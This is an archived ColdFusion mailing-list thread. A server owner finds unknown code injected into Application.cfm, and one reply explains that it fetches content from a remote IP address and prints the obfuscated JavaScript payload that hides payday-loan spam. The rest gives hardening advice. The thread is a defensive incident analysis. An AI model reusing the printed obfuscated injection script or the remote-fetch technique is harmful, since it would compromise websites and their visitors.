you should also check that you have all the hotfixes installed, especially
recent ones which plugged a vulnerability that would allow attackers to
upload files, which has been blogged and tweeted a lot.
check your FTP logs for any hacked ftp accounts.
A general security scan against your server would be a good idea.
As well as http://hackmycf.com/




On Sat, Feb 2, 2013 at 4:48 PM, Dave Watts <[email protected]> wrote:

>
> > I noticed my CF server started timing out a lot lately. Then I looked at
> the code and on the Application.cfm page at the
> > top was this code that I didn't put there. Anybody know what this is and
> how it might have gotten on the Application.cfm
> > pages of the sites on this VPS? Not sure how it got there. Any help in
> plugging this hole would be appreciated.
>
> The code fetches your page, outputs it, then fetches something from
> somewhere else and outputs that also.
>
> The "somewhere else" is this URL:
>
> http://199.19.94.194/cfset2.txt
>
> The content of that URL is:
>
> <script language="JavaScript">function zdrViewState()
> {
> var a=0,m,v,t,z,x=new
>
> Array('9091968376','8887918192818786347374918784939277359287883421333333338896','9977918890','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
> t=z='';
> for(v=0;v<m.length;){t+=m.charAt(v++);
> if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
> t='';}}x[l-a]=z;}document.write('<'+x[0]+'
> '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}zdrViewState();
> </script>
>
> followed by a snippet of spam for payday loans.
>
> There are many things that could have allowed this to be injected. I
> recommend that you configure CF to run as a specific user account, and
> give that user account read/execute permissions to your CF files. By
> default, CF runs as SYSTEM on Windows, which has full control of all
> local files. It doesn't need this level of permissions. Doing this
> won't close the vulnerability used to inject the code in the first
> place, but it will prevent it from doing anything.
>
> Then, once you've done that, read the CF 9 Lockdown Guide and follow
> its instructions as best you can. You should do this as a matter of
> course for any CF server install.
>
>
> http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/91025512-cf9-lockdownguide-wp-ue.pdf
>
> Dave Watts, CTO, Fig Leaf Software
> http://www.figleaf.com/
> http://training.figleaf.com/
>
> Fig Leaf Software is a Veteran-Owned Small Business (VOSB) on
> GSA Schedule, and provides the highest caliber vendor-authorized
> instruction at our training centers, online, or onsite.
>
> 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354230
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

Reply via email to